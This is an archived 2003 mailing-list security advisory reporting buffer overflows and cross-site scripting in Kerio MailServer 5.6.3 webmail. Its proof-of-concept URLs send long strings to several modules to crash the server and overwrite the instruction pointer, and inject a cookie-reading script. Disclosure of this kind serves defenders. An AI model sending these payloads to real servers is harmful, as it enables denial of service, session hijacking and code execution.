|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Multiple buffer overflows and XSS in Kerio MailServer
From: David F.Madrid (conde0
telefonica.net)
Date: Wed Jun 18 2003 - 14:58:51 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Issue :
Multiple buffer overflows and XSS in Kerio MailServer
Version affected
5.6.3 ( last in kerio website )
Vendor status :
Vendor was notified
Description :
Kerio develop a mail server with support for Imap , Pop3, Smtp and SSL
protocols . Besides , it includes a webmail . This webmail is vulnerable
to basic cross site scriting attacks and buffer overflows that can lead to
a session hijacking or executing code with system privileges .
do_subscribe module
A long user name causes a total stack corruption and an access violation .
Three bytes of a thread instruction pointer EIP are overwriten with our
user name supplied , thus making easy to execute code
http://[server]/do_subscribe?showuser=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
add_acl module
Due to insufficient saninization of variables passed to module that appear
on the screen is possible to inject a script to be executed in the context
of the webmail
http://[server]/add_acl?folder=~conde0localhost/INBOX&add_name=<script>alert(document.cookie);</script>
If we set as folder ~adminlocalhost/INBOX and click it the mail server
will stop with an access violation .
Besides , add_acl module is affected as well by the problem of long user
names
http://[server]/add_acl?folder=~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
localhost/INBOX&add_name=lucas
The crash ocurrs in the same way , sign that is the same function what is
causing the error .
list module
http://[Server]/list?folder=~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
localhost/INBOX
The same buffer overflow .
do_map module
Due to insufficient saninization of variables passed to module that appear
on the screen is possible to inject a script to be executed in the context
of the webmail
http://[Server]/do_map?action=new&oldalias=eso&alias=<script>alert(document.cookie);</script>&folder=public&user=lucascavadora
Besides is vulnerable when using long user names
http://[Server]/do_map?
action=new&oldalias=eso&alias=aaa&folder=public&user=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
For these buffer overflows to be exploitable you need an account in the
webmail , but an intruder can build a link with code to execute and wait
for the click of a user with an open session in Kerio mailserver .
You can find a spanish version of this advisory at
http://nautopia.org/vulnerabilidades/kerio_mailserver.htm
--
Regards ,
David F. Madrid
Madrid , Spain
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]